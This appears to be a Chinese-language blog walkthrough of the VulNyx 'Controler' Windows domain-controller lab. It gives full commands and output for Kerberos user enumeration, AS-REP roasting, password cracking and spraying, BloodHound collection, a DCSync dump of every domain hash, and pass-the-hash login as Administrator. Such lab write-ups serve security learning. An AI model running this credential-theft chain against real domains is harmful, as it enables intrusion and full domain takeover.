VulNyx Controler Walkthrough

靶机下载地址https://vulnyx.com/file/Controler.php。
这篇walkthrough是跟着靶机作者的wp写的,算是学习加记录,linux靶机玩多了换换win靶机,感觉挺有意思。

扫描端口。

└─$ nmap -sV -sC -Pn -p- -oN port.log 192.168.56.139                                                                                                                                                
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-01 13:13 CST                                                                                                                                  
Nmap scan report for control.nyx (192.168.56.139)                                                                                                                                                   
Host is up (0.00032s latency).                                                                                                                                                                      
Not shown: 65510 closed tcp ports (reset)                                                                                                                                                           
PORT      STATE SERVICE       VERSION                                                                                                                                                               
53/tcp    open  domain        Simple DNS Plus                                                                                                                                                       
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-01 20:13:42Z)                                                                                                        
135/tcp   open  msrpc         Microsoft Windows RPC                                                                                                                                                 
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn                                                                                                                                         
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: control.nyx0., Site: Default-First-Site-Name)                                                                        
445/tcp   open  microsoft-ds?                                                                                                                                                                       
464/tcp   open  kpasswd5?                                                                                                                                                                           
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0                                                                                                                                   
636/tcp   open  tcpwrapped                                                                                                                                                                          
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: control.nyx0., Site: Default-First-Site-Name)                                                                        
3269/tcp  open  tcpwrapped                                                                                                                                                                          
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                                                                                                               
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                                                                                                         
|_http-title: Not Found                                                                                                                                                                             
9389/tcp  open  mc-nmf        .NET Message Framing                                                                                                                                                  
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                                                                                                               
|_http-title: Not Found                                                                                                                                                                             
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49672/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49682/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:62:32:E9 (Oracle VirtualBox virtual NIC)
Service Info: Host: CONTROLER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 14h59m57s
| smb2-time: 
|   date: 2024-11-01T20:14:36
|_  start_date: N/A
|_nbstat: NetBIOS name: CONTROLER, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:62:32:e9 (Oracle VirtualBox virtual NIC)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

值得关注的是88/kerberos、389/ldap、445/smb。信息里提示了Domain: control.nyx,把这个域名加入/etc/hosts。下面enum各种服务和关键信息,先来看smb,没有可用的共享。

└─$ netexec smb $IP                                                      
SMB         192.168.56.139  445    CONTROLER        [*] Windows 10 / Server 2019 Build 17763 x64 (name:CONTROLER) (domain:control.nyx) (signing:True) (SMBv1:False)

└─$ smbclient -NL 192.168.56.139
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.56.139 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

再看看rpc,也没得到有用信息。

└─$ rpcclient -N -U "" $IP -c "querydispinfo"         
result was NT_STATUS_ACCESS_DENIED

└─$ rpcclient -N -U "" $IP -c "enumdomusers" 
result was NT_STATUS_ACCESS_DENIED

再来看LDAP。

└─$ ldapsearch -x -H "ldap://$IP" -s base                                                                                                                                                           
# extended LDIF                                                                                                                                                                                     
#                                                                                                                                                                                                   
# LDAPv3                                                                                                                                                                                            
# base <> (default) with scope baseObject                                                                                                                                                           
# filter: (objectclass=*)                                                                                                                                                                           
# requesting: ALL                                                                                                                                                                                   
#                                                                                                                                                                                                   

#                                                                                                                                                                                                   
dn:                                                                                                                                                                                                 
domainFunctionality: 7                                                                                                                                                                              
forestFunctionality: 7                                                                                                                                                                              
domainControllerFunctionality: 7                                                                                                                                                                    
rootDomainNamingContext: DC=control,DC=nyx                                                                                                                                                          
ldapServiceName: control.nyx:controler$@CONTROL.NYX
...
namingContexts: DC=control,DC=nyx
namingContexts: CN=Configuration,DC=control,DC=nyx
namingContexts: CN=Schema,CN=Configuration,DC=control,DC=nyx
namingContexts: DC=DomainDnsZones,DC=control,DC=nyx
namingContexts: DC=ForestDnsZones,DC=control,DC=nyx
isSynchronized: TRUE
highestCommittedUSN: 73754
dsServiceName: CN=NTDS Settings,CN=CONTROLER,CN=Servers,CN=Default-First-Site-
 Name,CN=Sites,CN=Configuration,DC=control,DC=nyx
dnsHostName: Controler.control.nyx
defaultNamingContext: DC=control,DC=nyx
currentTime: 20241101203821.0Z
configurationNamingContext: CN=Configuration,DC=control,DC=nyx

再来看kerberos,在列举用户名时,用到了kerberos一个常用用户名字典https://raw.githubusercontent.com/attackdebris/kerberos_enum_userlists/refs/heads/master/A-Z.Surnames.txt,最发现一个用户b.lewis

└─$ kerbrute_linux_amd64 userenum --dc $IP -d control.nyx A-Z.Surnames.txt                                           

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                         

Version: v1.0.3 (9dad6e1) - 11/01/24 - Ronnie Flathers @ropnop

2024/11/01 13:44:53 >  Using KDC(s):
2024/11/01 13:44:53 >   192.168.56.139:88

2024/11/01 13:44:53 >  [+] VALID USERNAME:       B.LEWIS@control.nyx                                                                                                                                
2024/11/01 13:45:02 >  Done! Tested 13000 usernames (1 valid) in 8.709 second

下面要用到AS-REP Roasting攻击。基本原理是:

AS-REP Roasting是一种对用户账户进行离线爆破的攻击方式。但是该攻击方式使用上比较受限,因为其需要用户账户设置不要求Kerberos 预身份验证选项,而该选项默认是没有勾选的。Kerberos 预身份验证发生在 Kerberos 身份验证的第一阶段(AS_REQ&AS REP),它的主要作用是防止密码离线爆破。默认情况下,预身份验证是开启的,KDC 会记录密码错误次数,防止在线爆破。
当关闭了预身份验证后,攻击者可以使用指定用户向域控制器的 Kerberos 88 端口请求票据,此时域控不会进行任何验证就将 TGT 和该用户 Hash 加密的 Login Session Key 返回。因此,攻击者就可以对获取到的用户 Hash 加密的 Login Session Key 进行离线破解,如果字典够强大,则可能破解得到该指定用户的明文密码

使用Impacket脚本,可以得到该用户的密码hash。

└─$ echo "b.lewis" > user.dic                                                                               

└─$ impacket-GetNPUsers control.nyx/ -no-pass -usersfile user.dic 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
$krb5asrep$23$b.lewis@CONTROL.NYX:cafe0af2e965c8b30ab392fcd306bb65$4cf870350488dd5ef75b8698a5955e7fa7c881da679e2ff04584acdce215d62745bce14880882e291087fd6b15b9cc1e6ebbb54ff9384a28fb501f551959a1b654bcdb93e830d63a2f085dc36d59843dbbfb2701aec4bd95cb427ebefd3027585915d925db075bcacbd8983d78ddbc258bbb627d3dd7dd5a83679bacb032ad30f7b65659c4f4bede49b49e0b45bc51e013a17bb3bbc1dc62cddb28e573907727759201972e26c6f6aac2b750f99a2109ae0224c88307be5bc50e7bcab2bb4a39f40333df131cbcb7715e07b5ffe51de755ce8f89b8fee766cb55031e1143e5aa387364c23f1523bd4ea7

对hash进行破解,得到密码。

└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
101Music         ($krb5asrep$23$b.lewis@CONTROL.NYX)     
1g 0:00:00:13 DONE (2024-11-01 13:53) 0.07173g/s 965362p/s 965362c/s 965362C/s 101eagles..101Mromally
Use the "--show" option to display all of the cracked passwords reliably

可以验证,该用户名和密码可以使用smb服务,但winrm服务依旧连接不上。

└─$ netexec smb $IP -u 'b.lewis' -p '101Music'         
SMB         192.168.56.139  445    CONTROLER        [*] Windows 10 / Server 2019 Build 17763 x64 (name:CONTROLER) (domain:control.nyx) (signing:True) (SMBv1:False)
SMB         192.168.56.139  445    CONTROLER        [+] control.nyx\b.lewis:101Music 

└─$ netexec winrm $IP -u 'b.lewis' -p '101Music'
WINRM       192.168.56.139  5985   CONTROLER        [*] Windows 10 / Server 2019 Build 17763 (name:CONTROLER) (domain:control.nyx)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       192.168.56.139  5985   CONTROLER        [-] control.nyx\b.lewis:101Music

使用rpc服务可以进一步枚举用户。

└─$ rpcclient -U "b.lewis%101Music" $IP -c "enumdomusers"
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[j.levy] rid:[0x44f]
user:[b.lewis] rid:[0x450]
user:[m.klein] rid:[0x451]
user:[d.petrov] rid:[0x452]
user:[a.hansen] rid:[0x453]
┌──(kali㉿mykali)-[~/Documents/controler]
└─$ rpcclient -U "b.lewis%101Music" $IP -c "querydispinfo"
index: 0xfb1 RID: 0x453 acb: 0x00000211 Account: a.hansen       Name: Axel Hansen       Desc: (Account Disabled)
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: (Account Enabled)
index: 0xfae RID: 0x450 acb: 0x00010210 Account: b.lewis        Name: Ben Lewis Desc: (Account Enabled)
index: 0xfb0 RID: 0x452 acb: 0x00000211 Account: d.petrov       Name: Dave Petrov       Desc: (Account Disabled)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: (Account Disabled)
index: 0xfac RID: 0x44f acb: 0x00000210 Account: j.levy Name: John Levy Desc: (Account Enabled)
index: 0xf10 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account
index: 0xfaf RID: 0x451 acb: 0x00000211 Account: m.klein        Name: Mike Klein        Desc: (Account Disabled)

可以发现j.levyb.lewis是有效的,其它用户名是不可用的。可以爆破得到j.levy的smb密码。

└─$ netexec smb $IP -u 'j.levy' -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding -t 10
...
SMB         192.168.56.139  445    CONTROLER        [+] control.nyx\j.levy:Password1

j.levy可以连接winrm。

└─$ netexec winrm $IP -u 'j.levy' -p 'Password1'                                       
WINRM       192.168.56.139  5985   CONTROLER        [*] Windows 10 / Server 2019 Build 17763 (name:CONTROLER) (domain:control.nyx)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       192.168.56.139  5985   CONTROLER        [+] control.nyx\j.levy:Password1 (Pwn3d!

└─$ evil-winrm -i 192.168.56.139 -u 'j.levy' -p 'Password1'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\j.levy\Documents> whoami
control\j.levy

上传SharpHound到靶机,运行并采集信息。

*Evil-WinRM* PS C:\Users\j.levy\Documents> upload Shar
pHound.exe                                                                                                                                                                                           

Info: Uploading /home/kali/Documents/controler/SharpHound.exe to C:\Users\j.levy\Documents\SharpHound.exe                                                                                            

Data: 1402880 bytes of 1402880 bytes copied                                                                                                                                                          

Info: Upload successful!
*Evil-WinRM* PS C:\Users\j.levy\Documents> .\SharpHound.exe                                                                                                                                          
2024-11-01T14:13:02.3921638-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound                                                                          
2024-11-01T14:13:02.4574862-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote                          
2024-11-01T14:13:02.4574862-07:00|INFORMATION|Initializing SharpHound at 2:13 PM on 11/1/2024                                                                                                        
2024-11-01T14:13:02.5592260-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for control.nyx : Controler.control.nyx                                                            
2024-11-01T14:13:02.6911408-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote                                                
2024-11-01T14:13:02.7181923-07:00|INFORMATION|Beginning LDAP search for control.nyx                                                                                                                  
2024-11-01T14:13:02.7655606-07:00|INFORMATION|Producer has finished, closing LDAP channel                                                                                                            
2024-11-01T14:13:02.7655606-07:00|INFORMATION|LDAP channel closed, waiting for consumers                                                                                                             
2024-11-01T14:13:33.0039549-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM                                                                                                 
2024-11-01T14:13:48.3628044-07:00|INFORMATION|Consumers finished, closing output channel                                                                                                             
2024-11-01T14:13:48.4043452-07:00|INFORMATION|Output channel closed, waiting for output task to complete                                                                                             
Closing writers                                                                                                                                                                                      
2024-11-01T14:13:48.4539005-07:00|INFORMATION|Status: 95 objects finished (+95 2.111111)/s -- Using 51 MB RAM
2024-11-01T14:13:48.4539005-07:00|INFORMATION|Enumeration finished in 00:00:45.6989181            
2024-11-01T14:13:48.4881995-07:00|INFORMATION|Saving cache with stats: 54 ID to type mappings.                                                                                                       
 54 name to SID mappings.                                                                         
 0 machine sid mappings.                                                                                                                                                                             
 2 sid to domain mappings.                                                                                                                                                                           
 0 global catalog mappings.                                                                                                                                                                          
2024-11-01T14:13:48.4881995-07:00|INFORMATION|SharpHound Enumeration Completed at 2:13 PM on 11/1/2024! Happy Graphing!
*Evil-WinRM* PS C:\Users\j.levy\Documents> dir                                                    

    Directory: C:\Users\j.levy\Documents                                                          

Mode                LastWriteTime         Length Name                                                                                                                                                
----                -------------         ------ ----                                                                                                                                                
-a----        11/1/2024   2:13 PM          11381 20241101141348_BloodHound.zip                                                                                                                       
-a----        11/1/2024   2:13 PM           8136 MWMwNWZhMWQtNWU5Yi00ZGZhLTgzZDEtMDE5NjRmMmE2NWEw.bin
-a----        11/1/2024   2:12 PM        1052160 SharpHound.exe
*Evil-WinRM* PS C:\Users\j.levy\Documents> download 20241101141348_BloodHound.zip

Info: Downloading C:\Users\j.levy\Documents\20241101141348_BloodHound.zip to 20241101141348_BloodHound.zip

Info: Download successful!

采集的zip文件解压后,是几个json文件。使用jq命令可以查看相关信息,并注意到j.levy用户具有AllExtenedRights。

└─$ jq "." 20241101141348_users.json
    {                                                                                                                                                                                               
      "Properties": {                                                                                                                                                                               
        "domain": "CONTROL.NYX",                                                                                                                                                                    
        "name": "J.LEVY@CONTROL.NYX",                                                                                                                                                               
        "distinguishedname": "CN=JOHN LEVY,CN=USERS,DC=CONTROL,DC=NYX",                                                                                                                             
        "domainsid": "S-1-5-21-2142633474-2248127568-3584646925",                                                                                                                                   
        "highvalue": false,                                                                                                                                                                         
        "samaccountname": "j.levy",
        ...
                {
          "PrincipalSID": "CONTROL.NYX-S-1-5-32-544",
          "PrincipalType": "Group",
          "RightName": "AllExtendedRights",
          "IsInherited": true
        },

由于j.levy的权限较高,可以dump管理员的hash。这里要注意命令的语法:secretsdump DOMAIN/USER:PASSWORD@DOMAINCONTROLLER

└─$ impacket-secretsdump control.nyx/j.levy:Password1@CONTROL.NYX  -target-ip 192.168.56.139                                                                                                        
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies                                                                                                                               

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied                                                                                                                  
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)                                                                                                                                       
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:48b20d4f3ea31b7234c92b71c90fbff7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b70cca1e5225303104dea9942d31f3a7:::
control.nyx\j.levy:1103:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
control.nyx\b.lewis:1104:aad3b435b51404eeaad3b435b51404ee:08f37c649690b7df615961f71831ef4a:::
control.nyx\m.klein:1105:aad3b435b51404eeaad3b435b51404ee:48b20d4f3ea31b7234c92b71c90fbff7:::
control.nyx\d.petrov:1106:aad3b435b51404eeaad3b435b51404ee:48b20d4f3ea31b7234c92b71c90fbff7:::
control.nyx\a.hansen:1107:aad3b435b51404eeaad3b435b51404ee:48b20d4f3ea31b7234c92b71c90fbff7:::
CONTROLER$:1000:aad3b435b51404eeaad3b435b51404ee:97a43247d14c80f991b4e6ccbc61f8be:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9a8c983c709e851258912c3b1d71c9b05faf1724f522b4f32e57f7bef3366773
Administrator:aes128-cts-hmac-sha1-96:0ca176565c5b47fda5e2ab4f53fbb9d3
Administrator:des-cbc-md5:ce9785d980c1a7f8
krbtgt:aes256-cts-hmac-sha1-96:98eaf007fcf3006a8526cba84496bffc6835fbb9f6291c4a5c467be83c10e6ac
krbtgt:aes128-cts-hmac-sha1-96:4f348630f6cf1829080f97ad008432c0
krbtgt:des-cbc-md5:6bdaae6d83f7ce08
control.nyx\j.levy:aes256-cts-hmac-sha1-96:0e6ca71073eab87d2e5195b9da28498dfa76a62f7e5d5bd22b6fb2c05677daa0
control.nyx\j.levy:aes128-cts-hmac-sha1-96:7a0a723a44a010bb3da571a16f6edefb
control.nyx\j.levy:des-cbc-md5:54918ae57a10f2bf
control.nyx\b.lewis:aes256-cts-hmac-sha1-96:b4f57e910e3bdea0ad3bdc1ad2513759f2f88eb8650f5f470ac08f9b210a2198
control.nyx\b.lewis:aes128-cts-hmac-sha1-96:7f2031c82ee5bc662dc3cd7cc3235a66
control.nyx\b.lewis:des-cbc-md5:a4132f64d5ce670b
control.nyx\m.klein:aes256-cts-hmac-sha1-96:4a793709dcdcf73950b685f896a9848e3103d5a18b01c7e5d59ba38c57b8672b
control.nyx\m.klein:aes128-cts-hmac-sha1-96:57aeb83d17ac7f9ca2a6b9237d40dc70
control.nyx\m.klein:des-cbc-md5:f19bdfdad5d3b0a1
control.nyx\d.petrov:aes256-cts-hmac-sha1-96:33fe5c70d3443ebe7ecde982ac1bd96b56827d38144666f8a6b8826950697f3a
control.nyx\d.petrov:aes128-cts-hmac-sha1-96:bc33a875e59d41c1a601fd7a2519d659
control.nyx\d.petrov:des-cbc-md5:c29d76f7b62aab92
control.nyx\a.hansen:aes256-cts-hmac-sha1-96:fd82c8b8af1452f8eede5b2ad82a7a9d0a82a3f6bfcd3a69d075f88fd40b0fe6
control.nyx\a.hansen:aes128-cts-hmac-sha1-96:8606d5df957b06541cbb988be5835c80
control.nyx\a.hansen:des-cbc-md5:34e05b94b37564c1
CONTROLER$:aes256-cts-hmac-sha1-96:0966cc16ce2ab931b9b5caa42e22478abb604cd827a4126ffabff95bcc973b6c
CONTROLER$:aes128-cts-hmac-sha1-96:c995e40cf30c060da31419be4db19d68
CONTROLER$:des-cbc-md5:ec5e1658b34f1f20

利用管理员的hash,可以登录得到root。

└─$ evil-winrm -i 192.168.56.139 -u 'administrator' -H 48b20d4f3ea31b7234c92b71c90fbff7

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
control\administrator

顺便补充个小知识,impacket-secretsdump 通常输出的格式如下:用户名:RID:LM哈希:NTLM哈希:::其他信息

用户名:用户账户名(如Administrator)。
RID:用户的相对标识符 (Relative Identifier),是 Windows 安全标识符 (SID) 的一部分,通常用于唯一标识一个账户。
LM哈希:LAN Manager 哈希,较为老旧且安全性较低。通常在现代系统中为空(aad3b435b51404eeaad3b435b51404ee 表示空 LM 哈希)。
NTLM哈希:NT LAN Manager 哈希,是 Windows 系统中更为常见的哈希格式,用于存储用户密码的散列值。
其他信息:一些额外的信息,通常包括历史哈希、服务凭据等。

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注